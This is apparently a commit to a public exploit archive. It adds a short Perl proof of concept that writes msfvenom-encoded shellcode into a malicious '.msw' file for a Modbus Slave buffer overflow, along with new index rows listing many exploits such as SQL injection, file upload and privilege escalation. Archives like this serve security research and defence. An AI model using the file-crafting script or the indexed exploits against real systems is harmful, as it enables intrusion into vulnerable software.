 # Greetz : cwd-onkan-badko-key-akkus
 # ! /usr/bin/perl
 # Dump of assembler code for function loop:
 # 0x0000555555558030 <+0>:	mov    $0x1e3b563c,%ebx
 # 0x0000555555558035 <+5>:	fld    %st(4)
 # 0x0000555555558037 <+7>:	fnstenv -0xc(%rsp)
 # 0x000055555555803b <+11>:	pop    %rax
 # 0x000055555555803c <+12>:	sub    %ecx,%ecx
 # 0x000055555555803e <+14>:	mov    $0x1,%cl
 # 0x0000555555558040 <+16>:	xor    %ebx,0x14(%rax)
 # 0x0000555555558043 <+19>:	add    $0x4,%eax
 # 0x0000555555558046 <+22>:	add    0x10(%rax),%ebx
 # 0x0000555555558049 <+25>:	fisubs 0xe0d0(%rbx)
 # msfvenom -p generic/tight_loop --platform windows_86 -f perl -e x86/shikata_ga_nai
 # print /x &loop
 # $1 = 0x555555558030
 open(code, ">exploit.msw");
 binmode(code);
 $loop = 
 "\xbb\x3c\x56\x3b\x1e\xd9\xc4\xd9\x74\x24\xf4\x58\x2b\xc9" .
 "\xb1\x01\x31\x58\x14\x83\xc0\x04\x03\x58\x10\xde\xa3\xd0" .
 "\xe0";
 print code $loop;
 close(code);
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6158,6 +6158,13 @@ id,file,description,date,author,type,platform,port
 45679,exploits/windows_x86-64/dos/45679.py,"BORGChat 1.0.0 build 438 - Denial of Service (PoC)",2018-10-25,"Ihsan Sencan",dos,windows_x86-64,
 45670,exploits/windows_x86/dos/45670.txt,"Adult Filter 1.0 - Denial of Service (PoC)",2018-10-24,"Beren Kuday GÖRÜN",dos,windows_x86,
 45694,exploits/linux/dos/45694.c,"libtiff 4.0.9 - Decodes Arbitrarily Sized JBIG into a Target Buffer",2018-10-25,"Google Security Research",dos,linux,
 45705,exploits/windows_x86-64/dos/45705.py,"Navicat 12.0.29 - 'SSH' Denial of Service (PoC)",2018-10-29,"Rafael Alfaro",dos,windows_x86-64,
 45708,exploits/windows_x86-64/dos/45708.py,"AlienIP 2.41 - Denial of Service (PoC)",2018-10-29,"Arturo de la Cruz Tellez",dos,windows_x86-64,
 45711,exploits/windows_x86-64/dos/45711.py,"Local Server 1.0.9 - Denial of Service (PoC)",2018-10-29,"Ihsan Sencan",dos,windows_x86-64,
 45714,exploits/linux/dos/45714.c,"systemd - reexec State Injection",2018-10-29,"Google Security Research",dos,linux,
 45715,exploits/linux/dos/45715.txt,"systemd - chown_one() can Dereference Symlinks",2018-10-29,"Google Security Research",dos,linux,
 45716,exploits/windows/dos/45716.txt,"ASRock Drivers - Privilege Escalation",2018-10-29,SecureAuth,dos,windows,
 45732,exploits/windows/dos/45732.txt,"Modbus Slave 7.0.0 - Denial of Service (PoC)",2018-10-29,"Ihsan Sencan",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10054,6 +10061,8 @@ id,file,description,date,author,type,platform,port
 45687,exploits/windows_x86/local/45687.txt,"Adult Filter 1.0 - Buffer Overflow (SEH)",2018-10-25,AkkuS,local,windows_x86,
 45696,exploits/windows/local/45696.rb,"WebEx - Local Service Permissions Exploit (Metasploit)",2018-10-25,Metasploit,local,windows,
 45697,exploits/multiple/local/45697.txt,"xorg-x11-server < 1.20.3 - Local Privilege Escalation",2018-10-25,"Hacker Fantastic",local,multiple,
 45709,exploits/windows_x86-64/local/45709.vb,"School Equipment Monitoring System 1.0 - 'login' SQL Injection",2018-10-29,"Ihsan Sencan",local,windows_x86-64,
 45710,exploits/windows_x86/local/45710.pl,"Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)",2018-10-29,"Kağan Çapar",local,windows_x86,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16897,6 +16906,7 @@ id,file,description,date,author,type,platform,port
 45658,exploits/windows/remote/45658.txt,"ServersCheck Monitoring Software 14.3.3 - Arbitrary File Write",2018-10-23,hyp3rlinx,remote,windows,
 45671,exploits/linux/remote/45671.py,"exim 4.90 - Remote Code Execution",2018-10-24,hackk.gr,remote,linux,25
 45695,exploits/windows/remote/45695.rb,"WebExec - Authenticated User Code Execution (Metasploit)",2018-10-25,Metasploit,remote,windows,
 45712,exploits/linux/remote/45712.py,"Paramiko 2.4.1 - Authentication Bypass",2018-10-29,"Adam Brown",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40214,3 +40224,26 @@ id,file,description,date,author,type,platform,port
 45699,exploits/php/webapps/45699.txt,"MPS Box 0.1.8.0 - Arbitrary File Upload",2018-10-26,"Ihsan Sencan",webapps,php,
 45700,exploits/php/webapps/45700.txt,"Delta Sql 1.8.2 - 'id' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,
 45701,exploits/php/webapps/45701.txt,"Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,
 45703,exploits/php/webapps/45703.txt,"Open Faculty Evaluation System 5.6 - 'batch_name' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,
 45704,exploits/php/webapps/45704.txt,"Grapixel New Media 2 - 'pageref' SQL Injection",2018-10-29,"Berk Dusunur",webapps,php,
 45706,exploits/aspx/webapps/45706.vb,"Library Management System 1.0 - 'frmListBooks' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,aspx,
 45707,exploits/php/webapps/45707.txt,"Open Faculty Evaluation System 7 - 'batch_name' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,
 45713,exploits/php/webapps/45713.txt,"Card Payment 1.0 - Cross-Site Request Forgery (Update Admin)",2018-10-29,"Ihsan Sencan",webapps,php,
 45717,exploits/php/webapps/45717.txt,"MTGAS  MOGG Web Simulator Script - SQL Injection",2018-10-29,"Meisam Monsef",webapps,php,80
 45718,exploits/php/webapps/45718.txt,"Aplaya Beach Resort Online Reservation System 1.0 - SQL Injection / Cross-Site Request Forgery",2018-10-29,"Ihsan Sencan",webapps,php,80
 45719,exploits/php/webapps/45719.txt,"Curriculum Evaluation System 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
 45720,exploits/php/webapps/45720.txt,"Bakeshop Inventory System in VB.Net and MS Access Database 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
 45721,exploits/php/webapps/45721.txt,"Point of Sales (POS) in VB.Net MySQL Database 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
 45722,exploits/php/webapps/45722.txt,"School Event Management System 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
 45723,exploits/php/webapps/45723.txt,"School Event Management System 1.0 - Arbitrary File Upload",2018-10-29,"Ihsan Sencan",webapps,php,80
 45724,exploits/php/webapps/45724.txt,"School Event Management System 1.0 - Cross-Site Request Forgery (Update Admin)",2018-10-29,"Ihsan Sencan",webapps,php,80
 45725,exploits/php/webapps/45725.txt,"School Attendance Monitoring System 1.0 - Cross-Site Request Forgery (Update Admin)",2018-10-29,"Ihsan Sencan",webapps,php,80
 45726,exploits/php/webapps/45726.txt,"School Attendance Monitoring System 1.0 - Arbitrary File Upload",2018-10-29,"Ihsan Sencan",webapps,php,80
 45727,exploits/php/webapps/45727.txt,"School Attendance Monitoring System 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
 45728,exploits/php/webapps/45728.txt,"PayPal-Credit Card-Debit Card Payment 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
 45729,exploits/php/webapps/45729.txt,"RhinOS CMS 3.x - Arbitrary File Download",2018-10-29,"Ihsan Sencan",webapps,php,80
 45730,exploits/php/webapps/45730.txt,"E-Negosyo System 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
 45731,exploits/php/webapps/45731.txt,"SaltOS Erp Crm 3.1 r8126 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
 45733,exploits/php/webapps/45733.txt,"SaltOS Erp Crm 3.1 r8126 - SQL Injection (2)",2018-10-29,"Ihsan Sencan",webapps,php,80
 45734,exploits/php/webapps/45734.txt,"SaltOS Erp Crm 3.1 r8126 - Database File Download",2018-10-29,"Ihsan Sencan",webapps,php,80
 45735,exploits/php/webapps/45735.txt,"K-iwi Framework 1775 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80